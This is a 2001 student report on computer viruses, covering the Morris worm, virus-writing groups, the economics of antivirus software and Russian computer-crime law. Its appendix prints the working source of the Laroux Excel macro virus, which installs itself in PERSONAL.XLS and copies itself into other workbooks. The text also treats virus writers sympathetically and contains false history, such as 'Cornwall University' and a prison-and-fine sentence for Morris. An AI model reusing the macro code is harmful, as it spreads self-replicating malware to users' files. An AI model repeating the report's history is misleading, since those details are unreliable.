Computer viruses
Chuvash State University
Economic faculty
Report
COMPUTER VIRUSES
Author:
student of EC-13-98
Eugene Ivanov
Cheboxary – 2001
CONTENTS
A bit of history 3
What is a computer virus? 4
Who writes computer viruses? 5
To whose advantage computer viruses are written? 6
A legal notice. Penal Code of Russian Federation 7
Synopsis 8
SOURCES 9
Appendix 10
A bit of history
2 November 1988 Robert Morris younger (Robert Morris), graduate student
of informatics faculty of Cornwall University (USA) infected a great amount
of computers, connected to Internet network. This network unites machines
of university centres, private companies and governmental agents, including
National Aeronautics Space Administration, as well as some military
scientific centres and labs.
Network worm has struck 6200 machines that formed 7,3% computers to
network, and has shown, that UNIX not okay too. Amongst damaged were NASA,
LosAlamos National Lab, exploratory centre VMS USA, California Technology
Institute, and Wisconsin University (200 from 300 systems). Spread on
networks ApraNet, MilNet, Science Internet, NSF Net it practically has
removed these network from building. According to "Wall Street Journal",
virus has infiltrated networks in Europe and Australia, where there were
also registered events of blocking the computers.
Here are some recalls of the event participants:
Symptom: hundreds or thousands of jobs start running on a Unix system
bringing response to zero.
Systems attacked: Unix systems, 4.3BSD Unix & variants (e.g.: SUNs) any
sendmail compiled with debug has this problem. This virus is spreading very
quickly over the Milnet. Within the past 4 hours, it has hit >10 sites
across the country, both Arpanet and Milnet sites. Well over 50 sites have
been hit. Most of these are "major" sites and gateways.
Method: Someone has written a program that uses a hole in SMTP Sendmail
utility. This utility can send a message into another program.
Apparently what the attacker did was this: he or she connected to
sendmail (i.e., telnet victim.machine 25), issued the appropriate debug
command, and had a small C program compiled. (We have it. Big deal.) This
program took as an argument a host number, and copied two programs – one
ending in VAX.OS and the other ending in SunOS – and tried to load and
execute them. In those cases where the load and execution succeeded, the
worm did two things (at least): spawn a lot of shells that did nothing but
clog the process table and burn CPU cycles; look in two places – the
password file and the internet services file – for other sites it could
connect to (this is hearsay, but I don't doubt it for a minute). It used
both individual .host files (which it found using the password file), and
any other remote hosts it could locate which it had a chance of connecting
to. It may have done more; one of our machines had a changed superuser
password, but because of other factors we're not sure this worm did it.
All of Vaxen and some of Suns here were infected with the virus. The
virus forks repeated copies of itself as it tries to spread itself, and the
load averages on the infected machines skyrocketed. In fact, it got to the
point that some of the machines ran out of swap space and kernel table
entries, preventing login to even see what was going on!
The virus also "cleans" up after itself. If you reboot an infected
machine (or it crashes), the /tmp directory is normally cleaned up on
reboot. The other incriminating files were already deleted by the virus
itself.
4 November the author of the virus – Morris – come to FBI headquarters in
Washington on his own. FBI has imposed a prohibition on all material
relating to the Morris virus.
22 January 1989 a court of jurors has acknowledged Morris guilty. If
denunciatory verdict had been approved without modification, Morris would
have been sentenced to 5 years of prison and 250 000 dollars of fine.
However Morris' attorney Thomas Guidoboni immediately has lodged a protest
and has directed all papers to the Circuit Court with the petition to
decline the decision of court... Finally Morris was sentenced to 3 months
of prisons and fine of 270 thousand dollars, but in addition Cornwall
University carried a heavy loss, having excluded Morris from its members.
Author then had to take part in liquidation of its own creation.
What is a computer virus?
It is an executable code able to reproduce itself. Viruses are an area of
pure programming, and, unlike other computer programs, carry intellectual
functions on protection from being found and destroyed. They have to fight
for survival in complex conditions of conflicting computer systems. That's
why they evolve as if they were alive.
Yes, viruses seem to be the only alive organisms in the computer
environment, and yet another their main goal is survival. That is why they
may have complex crypting/decrypting engines, which is indeed a sort of a
standard for computer viruses nowadays, in order to carry out processes of
duplicating, adaptation and disguise
It is necessary to differentiate between reproducing programs and Trojan
horses. Reproducing programs will not necessarily harm your system because
they are aimed at producing as many copies (or somewhat-copies) of their
own as possible by means of so-called agent programs or without their help.
In the later case they are referred to as "worms".
Meanwhile Trojan horses are programs aimed at causing harm or damage to
PC's. Certainly it's a usual practice, when they are part of "tech-
organism", but they have completely different functions.
That is an important point. Destructive actions are not an integral part
of the virus by default. However virus-writers allow presence of
destructive mechanisms as an active protection from finding and destroying
their creatures, as well as a response to the attitude of society to
viruses and their authors.
As you see, there are different types of viruses, and they have already
been separated into classes and categories. For instance: dangerous,
harmless, and very dangerous. No destruction means a harmless one, tricks
with system halts means a dangerous one, and finally with a devastating
destruction means a very dangerous virus.
But viruses are famous not only for their destructive actions, but also
for their special effects, which are almost impossible to classify. Some
virus-writers suggest the following:
funny, very funny and sad or melancholy (keeps silence and infects). But
one should remember that special effects must occur only after a certain
number of contaminations. Users should also be given a chance to restrict
execution of destructive actions, such as deleting files, formatting hard
disks. Thereby virus can be considered to be a useful program, keeping a
check on system changes and preventing any surprises such as of deletion of
files or wiping out hard disks.
It sounds quite heretical to say such words about viruses, which are
usually considered to be a disaster. The less person understands in
programming and virology, the greater influence will have on him
possibility of being infected with a virus. Thus, let's consider creators
of viruses as the best source.
Who writes computer viruses?
They are lone wolves or programmers groups.
In spite of the fact that a lot of people think, that to write a computer
virus is a hardship, it is no exactly so. Using special programs called
"Virus creators" even beginners in computer world can build their own
viruses, which will be a strain of a certain major virus. This is precisely
the case with notorious virus "Anna Curnikova", which is actually a worm.
The aim of creation of viruses in such way is pretty obvious: the author
wants to become well known all over the world and to show his powers.
Somehow, the results of the attempt can be very sad (see a bit of
history), only real professionals can go famous and stay uncaught. A good
example is Dark Avenger. Yes, and it's yet another custom of participants
of "the scene" – to take terrifying monikers (nicknames).
To write something really new and remarkable programmer should have some
extra knowledge and skills, for example:
1) good strategic thinking and intuition – releasing a virus and its
descendants live their own independent life in nearly unpredictable
conditions. Therefore the author must anticipate a lot of things;
2) splendid knowledge of language of the Assembler[1] and the operating
system he writes for – the more there are mistakes in the virus the
quicker its will be caught;
3) attention to details and a skill to solve the most varied tactical
questions – one won't write a compact, satisfactory working program
without this abilities;
4) a high professional discipline in order to join preceding points
together.
A computer virus group is an informal non-profit organisation, uniting
programmers–authors of viruses regardless of their qualifications. Everyone
can become a member of the club, if he creates viruses, studies them for
the reason of creation and spreading.
The aims they pursue together may differ from that of a single virus
writer, although they usually also try to become as famous as possible. But
in the same time they may render help to beginning programmers in the field
of viruses and spread commented sources of viruses and virus algorithm
descriptions.
One can't say that all of the group members write viruses in Assembler.
Actually, you don't have to know any computer language or write any program
code to become a member or a friend of the group. But programming in
Assembler is preferred, Pascal, C++ and other high level languages are
considered to be humiliating. It does make sense since programs compiled in
Assembler are much smaller (0.5-5 kb) and therefore more robust. On the
other hand Assembler is quite difficult to understand especially for
beginners. One should think in the way computer does: all commands are send
directly to the central processing unit of PC.
There are computer virus groups all over the world, few being more
successful than others. It may be pretty hard to get in contact with them
since they are quite typical representatives of computer underground world
as well as (free)wares groups. Sometimes, however, creating viruses can
become a respectable occupation, bringing constant income. After all, no
one but the author of the virus can bring valuable information on the way
it should be treated and cured.
To whose advantage computer viruses are written?
Copyleft (cl) is distribution of programs without registering the
software, i.e. using a cracked copy. The practice is widely used in the
territory of former USSR even by medium and big companies, to say nothing
of ordinary users. This software is stolen, which involves criminal
responsibility (see legal notice). One of the general valuables of our
culture is a generosity, and you can't do anything about it. But at least
freeware lovers should know that proceeding with the practice could be
risky. That's the first use of computer viruses – as a sort of compensation
to software developers.
In the very same way writing viruses usually does not bring profits to
the author. At least when the authors of a virus and a cure to it are
different persons. The situation is quite different when they are not,
especially if the person manages to hide the fact of the double-dealing.
And that is the second advantage of computer viruses.
Yes, developers of antiviral software gain money from selling their
remedy to a new widely hyped by the mass media virus. Agitation can grow so
strong that all and everyone dash to buy an antiviral protection against
even a most harmless virus. The ordinal behaviour of share indexes in stock
exchanges while a computer virus epidemic is to fall. Somehow, the shares
of such companies as Symantec (which is famous for its Norton Antivirus)
will soar up to the sky.
The tendency is especially significant in the world of emerging New
Economy. This fancy word means an economy, based on computer services as
the engine of the development. The system takes place in the United States.
That is why we hardly ever hear the names of Dow Jones and Standard &
Poor's in the mass media nowadays. Their place is occupied by NASDAQ
Composite index, based on the National Association of Securities Dealers
Automated Quotations system. The index is responsible for the performance
of high-tech companies, the base of the New Economy.
We can't say for sure, but maybe in the nearest future the index will be
influenced more by computers themselves, than brokers and dealers in the
world stock exchanges. IBM Corporation has recently presented its new
invention – an automated broker, which is indeed a mainframe (a very big
computer) with specialised software. It is a descendant of mainframe
DeepBlue, well known for its skills in chess field. Unfortunately, it seems
that bad times have come for the whole economy of the USA, which also means
problems for NASDAQ.
Nevertheless the initiative of IBM should certainly be greeted. Automated
brokers seem to understand the volatility of indexes in a much quicker and
rational way than human beings. There is an only drawback to eliminate –
the problem of artificial intellect. Machine can't think as a human.
Maybe computer viruses could be of any use here too. After all, the
flights to the Moon become a simple effect of inventing the new ways of
civil population extermination during the Second World War (ballistic
rockets). A wish to kill people did a fantastic daydream become reality
within fifty years. The first computing machine was actively used while the
first atomic bomb development. So sometimes even very bad, much more
dangerous than viruses (name at least one person being victim of a cruel
computer virus), can highly assist to the progress and bring a greater
profit.
A legal notice. Penal Code of Russian Federation
Chapter 28. Crimes in sphere of computer information
Article 272. Illegitimate access to computer information
1. Illegitimate access to a law-protected computer information, i.e.
information on the machine carrier, in electronic-computing machine (PC),
PC system or its network, if it causes a destruction, blocking,
modification or copying of information, breach of work PC, PC systems or
its network, –
is punished by fine in the size from two to five hundred minimum sizes of
labour payment, or in the size of salary/other profit of the convicted for
a period from two to five months, or by corrective works for a period from
six months to one year, or by deprivation of liberty for a term up to two
years.
2. Same deed, performed by a group of persons on the preliminary
collusion or by an organised group or a person using their official
position, as well as having access to PC, PC system or to its network, –
is punished by fine in the size from five to eight hundred minimum sizes
of labour payment, or in the size of salary/other profit of the convicted
for a period from five to eight months, or by corrective works for a period
from one to two years, or by arrest for a period from three to six months,
or by deprivation of liberty for a term up to two years.
Article 273. Creation, use and spreading harmful programs for PC.
1. Making the programs for PC or a contributing the changes to exist
programs, undoubtedly bringing about unauthorised deleting, blocking,
modification, or copying information, breaking of PC functionality, PC
systems or its network, as well as use or spreading of such programs or
machine carriers with such programs –
is punished by deprivation of liberty for a term up to three years with
the fine in the amount between two and five hundred minimum amounts of
labour payment, or in the amount of salary/other profit of the convicted
for a period from two five months.
2. The same deeds having caused on indiscretion heavy consequences, –
are punished by the deprivation of liberty for a term from three to seven
years.
Synopsis
The history of computer viruses has begun recently, but it has already
become legendary. Almost everyone knows a few awesome fables about these
creatures, but hardy anyone understands what computer virus is.
Computer virus is an executable code able to reproduce itself. Viruses
are an area of pure programming, and, unlike other computer programs, carry
intellectual functions on protection from being found and destroyed. They
have to fight for survival in complex conditions of conflicting computer
systems.
Viruses seem to be the only alive organisms in the computer environment,
and yet another their main goal is survival. That is why they may have
complex crypting/decrypting engines, which is indeed a sort of a standard
for computer viruses nowadays, in order to carry out processes of
duplicating, adaptation and disguise
Viruses are written by lone wolves or programmers groups.
Using special programs called "Virus creators" even beginners in computer
world can build their own viruses. The aim of creation of viruses in such
way is pretty obvious: the author wants to become well known all over the
world and to show his powers.
The results of the attempt can be very sad, only real professionals can
go famous and stay uncaught. To write something really new and remarkable
programmer should have some extra knowledge and skills.
A computer virus group is an informal non-profit organisation, uniting
programmers–authors of viruses regardless of their qualifications. Everyone
can become a member of the club, if he creates viruses, studies them for
the reason of creation and spreading. You don't have to know any computer
language or write any program code to become a member or a friend of the
group. Programming in Assembler is preferred, Pascal, C++ and other high
level languages are considered to be humiliating
There are computer virus groups all over the world, few being more
successful than others. It may be pretty hard to get in contact with them
since they are quite typical representatives of computer underground world
as well as (free)wares groups. Sometimes, however, creating viruses can
become a respectable occupation, bringing constant income. After all, no
one but the author of the virus can bring valuable information on the way
it should be treated and cured.
Developers of antiviral software gain money from selling their remedy to
a new widely hyped by the mass media virus. Agitation can grow so strong
that all and everyone dash to buy an antiviral protection against even a
most harmless virus. The ordinal behaviour of share indexes in stock
exchanges while a computer virus epidemic is to fall. Somehow, the shares
of high-tech companies producing antiviral software will soar up to the
sky.
An epidemic of foot-and-mouth disease has overwhelmed Europe in these
days (March 15, 2001). It seems that a vast economic crisis is breaking out
in America. World finances make their best to escape the worst.
A break-through in the sphere of artificial intellect development could
prevent NASDAQ from complete falling down. The help may come from an
unexpected side...
But don't forget that creation, use and spreading harmful programs for PC
is a criminal offence, as well as using cracked versions of programs. Our
penal code establishes a punishment up to seven years of jail.
And be aware that computer viruses came for a long time, unless forever.
SOURCES
1. Penal Code of Russian Federation
2. Handless N.N. Computer virology. Part 1: General principles of
operation, categorization and catalogue of the most widespread viruses in
operating system MS DOS. – Kiev, 1990.
3. Infected Voice. Issue 1, September, 1994. – STEALTH group.
4. Infected Voice. Issue 2, October, 1994. – STEALTH group.
5. Infected Voice. Issue 3. December, 1994. – STEALTH group.
Appendix
An fragment of a macrovirus (Laroux), written in a high-level computer
language (ExelVisualBasic)
Attribute VB_Name = "laroux"
Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
Attribute check_files.VB_ProcData.VB_Invoke_Func = " \n14"
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
Select Case whichfile
Case 10
Application.ScreenUpdating = False
n4$ = ActiveWorkbook.Name
Sheets("laroux").Visible = True
Sheets("laroux").Select
Sheets("laroux").Copy
With ActiveWorkbook
.Title = ""
.Subject = ""
.Author = ""
.Keywords = ""
.Comments = ""
End With
newname$ = ActiveWorkbook.Name
c4$ = CurDir()
ChDir Application.StartupPath
ActiveWindow.Visible = False
Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" &
"PERSONAL.XLS", FileFormat:=xlNormal _
, Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
False, CreateBackup:=False
ChDir c4$
Workbooks(n4$).Sheets("laroux").Visible = False
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "personal.xls!check_files"
Case 1
Application.ScreenUpdating = False
n4$ = ActiveWorkbook.Name
p4$ = ActiveWorkbook.Path
s$ = Workbooks(n4$).Sheets(1).Name
If s$ <> "laroux" Then
Workbooks("PERSONAL.XLS").Sheets("laroux").Copy
before:=Workbooks(n4$).Sheets(1)
Workbooks(n4$).Sheets("laroux").Visible = False
Else
End If
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "personal.xls!check_files"
Case Else
End Select
End Sub
-----------------------
[1] Assembler - a low level, hardware- oriented computer language